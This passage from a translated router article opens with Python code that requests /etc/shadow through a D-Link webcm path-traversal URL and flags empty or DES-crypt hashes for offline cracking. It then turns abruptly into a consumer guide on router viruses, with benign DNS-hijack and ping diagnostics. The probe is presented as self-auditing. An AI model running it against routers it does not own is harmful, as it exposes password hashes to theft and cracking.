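            entries.append((fields[0], hash_kind(fields[1])))
    return entries


def weak_accounts(text):
    """Accounts with no password at all, or with DES crypt, which silently
    truncates the password to 8 characters and is cheap to brute-force."""
    return [(user, kind) for user, kind in parse_shadow(text)
            if kind in ("empty", "des-crypt")]


def looks_like_shadow(body):
    """A root entry with at least the 9 colon-separated shadow fields."""
    return any(line.startswith("root:") and line.count(":") >= 8
               for line in body.splitlines())


def webcm_leaks_shadow(base_url, timeout=5):
    """True if GET <base_url>/cgi-bin/webcm?getpage=/etc/shadow returns
    something that parses as a shadow file containing root."""
    req = urllib.request.Request(base_url.rstrip("/") + WEBCM_PROBE,
                                 headers={"User-Agent": "router-audit"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read(8192).decode("latin-1", "replace")
    except (urllib.error.URLError, OSError):
        return False
    return looks_like_shadow(body)


if __name__ == "__main__":
    for user, kind in weak_accounts(SAMPLE_SHADOW):
        print(f"{user}: {kind}")
    # webcm_leaks_shadow("http://192.168.1.1")   # against your own router only
```

If the probe returns True, the Web interface alone gives away the hashes, so closing telnet is not enough: the password must survive an offline crack, and with DES crypt only its first 8 characters count.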

Conclusion

Many routers and similar devices, not only D-Link's, are built on the AR7 chip; the list includes Acorp, NETGEAR, Linksys, Actiontec... The AR7 is quite popular, along with MontaVista. It follows that, using the same toolchain, you can carry out the steps described in this article without any problems.

Think about it: besides harmful actions, you can also do something useful and pleasant for yourself and others (I won't argue, the pleasure of hacking can't be replaced, but still). You can make your own firmware, for example for more powerful routers that can download and seed torrents... All models have a USB 1.1 interface, but on the lower-end models it is not soldered in. Add a USB module and a file system driver to the kernel, equip the router with flash storage, and you get a kind of network storage for little money. There are many options, and ideas should come by the thousand: don't limit yourself, create!

Problems with a router's Wi-Fi arise for various reasons. One of them is infection of the distributing device with a virus, which you can get rid of yourself. Such viruses come in two kinds:

  • a virus that slows down the Internet in various ways. For example, such malicious software messes up the firmware settings or starts downloading advertising content onto the computer;
  • a virus that substitutes website addresses. It looks like this: a user goes to a known safe site, and the virus changes the DNS in such a way that the user ends up on an advertising site or sees advertising banners where the site owners did not place them. Such a virus is also dangerous because it can redirect you to a site containing other viruses.

In any case, if you notice that your router is not working correctly, you should check it for viruses, especially since they are very easy to get rid of.
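A way to check for the DNS substitution described above, as an added example that is not from the original article: it sends the same A query to the router's resolver and to a resolver you trust and flags a disagreement. The router address 192.168.0.1, the trusted resolver 9.9.9.9, example.com and the sample response bytes are assumptions or constructed data.

```python
import socket
import struct

def build_a_query(name: str, txid: int = 0x1234) -> bytes:
    """Minimal DNS query: one A question, recursion desired."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    labels = [lab.encode() for lab in name.strip(".").split(".")]
    qname = b"".join(bytes([len(lab)]) + lab for lab in labels) + b"\x00"
    return header + qname + struct.pack(">HH", 1, 1)   # QTYPE=A, QCLASS=IN

def _skip_name(data: bytes, pos: int) -> int:
    """Return the offset just past a (possibly compressed) domain name."""
    while data[pos] != 0:
        if data[pos] & 0xC0 == 0xC0:      # compression pointer: two bytes, name ends here
            return pos + 2
        pos += 1 + data[pos]
    return pos + 1

def parse_a_records(resp: bytes) -> list[str]:
    """IPv4 addresses from the answer section (other record types are skipped)."""
    _txid, _flags, qdcount, ancount, _ns, _ar = struct.unpack(">HHHHHH", resp[:12])
    pos = 12
    for _ in range(qdcount):
        pos = _skip_name(resp, pos) + 4               # skip QTYPE and QCLASS
    addrs = []
    for _ in range(ancount):
        pos = _skip_name(resp, pos)
        rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", resp[pos:pos + 10])
        pos += 10
        if rtype == 1 and rdlen == 4:
            addrs.append(socket.inet_ntoa(resp[pos:pos + 4]))
        pos += rdlen
    return addrs

def query_a(server: str, name: str, timeout: float = 2.0) -> list[str]:
    """Ask one resolver over UDP/53 and return its A records (needs network access)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_a_query(name), (server, 53))
        data, _ = sock.recvfrom(512)
    return parse_a_records(data)

def resolvers_agree(router_answers: list[str], trusted_answers: list[str]) -> bool:
    """Overlap rather than equality, since CDN-hosted names legitimately rotate addresses."""
    return bool(set(router_answers) & set(trusted_answers))

# Constructed response (not a real capture): example.com -> 192.0.2.1, TTL 60, name compressed
SAMPLE_RESPONSE = (b"\x12\x34\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00"
                   b"\x07example\x03com\x00\x00\x01\x00\x01"
                   b"\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04\xc0\x00\x02\x01")
```

To run the check on a live network, compare `query_a("192.168.0.1", "example.com")` with `query_a("9.9.9.9", "example.com")` using `resolvers_agree`; a persistent mismatch for well-known names points at the router's DNS settings.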

How does a virus get into a router?

The router provides the Internet to all devices connected to it. This means that all devices and the router itself are on the same home network. This is what the virus takes advantage of: it gets onto the computer from some website or downloaded file, and then spreads over the network to the router, where it begins to do its damage. The details depend on the particular virus: some malware does not reveal itself on the computer at all and only begins to act once it gets into the router, while others manage to harm both the operating system and the router's firmware at the same time.

Checking the router

Before cleaning your router of viruses, you need to check whether there are any on it. To get a baseline, use the Internet directly through your computer: unplug the WAN cable or modem from the router, plug it into the computer's port, and then follow these steps.

If you are having problems with speed, follow these three steps.

  1. Check your internet speed. This needs to be done in order to find out in the future whether the speed is the same when using the network directly and through a router. For example, you can download a file or use the special online service Speedtest.

    We scan the Internet speed through the Speedtest website

  2. To assess the signal quality more accurately, you need to find out the ping value. Ping is the time it takes for a packet to be sent from your device, reach the server and return. Naturally, the larger it is, the worse for you. Open a command line and run the ping command followed by the IP address of your connection; the default is usually 192.168.0.1, but it may vary. Remember the result. A ping of up to 40 ms is an excellent indicator, 40–110 ms is a normal average value, and more than 110 ms is worth thinking about reconfiguring the network, improving the signal or changing the provider.

    Execute the ping ip command

  3. After the list of sent packets, you will see statistics. You are interested in the "Packets" line, which counts how many packets were sent, received and lost. If the share of lost packets exceeds 5%, you need to find out what the problem is. If a large number of packets do not reach the server or do not return, this greatly affects Internet speed.

    Let's see what percentage of packets are lost

After you have completed all the above steps and obtained detailed information about ping, the number of lost packets and Internet speed, reconnect the WAN cable or modem to the router and check the same indicators when connected via Wi-Fi. If the parameters are at approximately the same level, the problem is not in the router; perhaps the cause is on the operator's side. Otherwise, if problems occur only when using the Internet through the router, you need to reset its settings and clean it of viruses.
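The three checks above (ping, packet loss and the direct-versus-router comparison), as an added example that is not part of the original article: it parses the statistics block that ping prints and applies the article's thresholds. It also handles the Linux/macOS ping output format in addition to Windows; the sample outputs are constructed, and the tolerances in router_suspect are assumptions.

```python
import re
from dataclasses import dataclass

@dataclass
class PingStats:
    sent: int
    received: int
    avg_ms: float          # float("inf") when no reply came back at all

    @property
    def loss_pct(self) -> float:
        return 100.0 * (self.sent - self.received) / self.sent if self.sent else 100.0

# Windows: "Packets: Sent = 4, Received = 4, Lost = 0 (0% loss)" / "Average = 3ms"
# Linux/macOS: "4 packets transmitted, 4 received, 0% packet loss" / "rtt min/avg/max/mdev = a/b/c/d ms"
_COUNTS = re.compile(r"Sent = (\d+), Received = (\d+)|(\d+) packets transmitted, (\d+) (?:packets )?received")
_AVG = re.compile(r"Average = ([\d.]+)ms|= [\d.]+/([\d.]+)/")

def parse_ping(output: str) -> PingStats:
    """Parse the statistics printed at the end of a ping run (either platform)."""
    m = _COUNTS.search(output)
    if not m:
        raise ValueError("no ping statistics found in output")
    sent, received = (int(m[1]), int(m[2])) if m[1] else (int(m[3]), int(m[4]))
    a = _AVG.search(output)
    avg = float(a[1] or a[2]) if a else float("inf")
    return PingStats(sent, received, avg)

def rate_ping(stats: PingStats) -> list[str]:
    """Article's thresholds: >5% loss is a problem; <=40 ms excellent, 40-110 average, >110 poor."""
    findings = []
    if stats.loss_pct > 5:
        findings.append(f"{stats.loss_pct:.0f}% packet loss exceeds 5%")
    if stats.avg_ms <= 40:
        findings.append("latency excellent")
    elif stats.avg_ms <= 110:
        findings.append("latency average")
    else:
        findings.append("latency poor")
    return findings

def router_suspect(direct: PingStats, via_router: PingStats, loss_tol=5.0, ms_tol=40.0) -> bool:
    """Article's comparison: clearly worse results through the router than directly point at the
    router rather than the provider. The tolerances are assumptions, not from the article."""
    return (via_router.loss_pct - direct.loss_pct > loss_tol
            or via_router.avg_ms - direct.avg_ms > ms_tol)

# Constructed sample ping statistics (not real captures): direct connection vs through the router
DIRECT = "Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),\n    Minimum = 11ms, Maximum = 14ms, Average = 12ms"
VIA_ROUTER = "Packets: Sent = 4, Received = 3, Lost = 1 (25% loss),\n    Minimum = 100ms, Maximum = 160ms, Average = 130ms"
```

On a real machine, feed the output of `ping <target>` run directly and then through the router into `parse_ping` and pass both results to `router_suspect`.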

Virus removal

To remove the virus, you need to reset the settings to default values. If the virus managed to damage the firmware, you will have to install it again yourself.

Reset settings

  1. Find the Reset button on the back of the router. Usually it is smaller than all the others. Press and hold it for 10–15 seconds. When the router turns off and starts to reboot, you can release it. The reboot indicates that the settings have been reset. Note that the password you set will also be lost.

    Press the Reset button

  2. To reconfigure the router, you need to connect it to your computer via cable, and then open your browser and go to http://192.168.0.1. Perhaps the address will be different; you can find it on a sticker located on the router itself, or in the documentation that came with the router. You will be asked for a login and password, the default login is admin, and the password is admin or 12345. More details are described in the instructions for the router.
  3. Go to Quick Setup. Specify the options that suit you. If you want, set a password and change the network name. After completing the setup procedure, save the changes and reboot the router.

    Go to the “Quick setup” section and set convenient settings

After completing all the above steps, check if you got rid of the error. If not, you will have to reflash the router manually.

Reflashing the router

Reflashing the router is only possible when the device is connected to the computer via a cable. You cannot update the firmware over Wi-Fi.

  1. There is a sticker on the back of the router. Find your router model on it. It also contains information about the firmware version installed initially. If that version is 7, it is better to install the update for version 7, to avoid a conflict between firmware that is too new and the router's older hardware.

    Find out the firmware version and router model

  2. Go to the manufacturer's website and use the search bar to find the desired version for your model. Download it to your computer.

    Find and download the required firmware version

  3. The downloaded file will be archived. Extract its contents to any convenient folder.

How to protect your router from viruses in the future

The only way to protect your router from viruses is to prevent them from getting onto your computer. Your computer is protected by an antivirus. Install a modern antivirus and under no circumstances disable it. It is almost impossible to catch malicious software with an active antivirus. It is not even necessary to use paid security programs; nowadays, high-quality free equivalents are sufficient.

What to do if nothing helps

If following all the above instructions did not bring the desired result, there are two options left: the problem arises from a breakdown of the router's hardware or from errors on the provider's side. First, call the company that provides your Internet, tell them about your problem and the methods that have not helped solve it. Second, take the router to a service centre so that it can be examined by specialists.

Infecting a router with a virus is a rare occurrence, but a dangerous one. There are two ways to get rid of the virus: by resetting the settings and by updating the firmware. You also need to make sure that no malware remains on your computer.